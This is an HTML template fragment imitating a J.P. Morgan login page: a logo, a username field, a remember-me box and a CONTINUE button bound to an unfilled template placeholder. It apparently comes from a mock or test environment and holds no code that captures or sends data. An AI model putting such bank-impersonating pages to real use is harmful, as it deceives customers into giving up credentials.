<div class="login-container">
    <img src="/static/JPMorganLogo.png" alt="J.P. Morgan" style="width: 200px; margin: 0 auto 30px; display: block;">
    <div class="login-title">Log in - gh.html</div>
    <div class="input-label">Username</div>
    <input type="text" 
           id="username-input" 
           placeholder="Enter your username"
           class="username-input">
    <div class="remember-me">
        <input type="checkbox" id="remember-username">
        <label for="remember-username">Remember username</label>
    </div>
    <button onclick="{{ continue_action }}" 
            class="continue-button">
        CONTINUE
    </button>
    <div class="help-link">
        <a href="#">NEED HELP LOGGING IN?</a>
    </div>
</div> 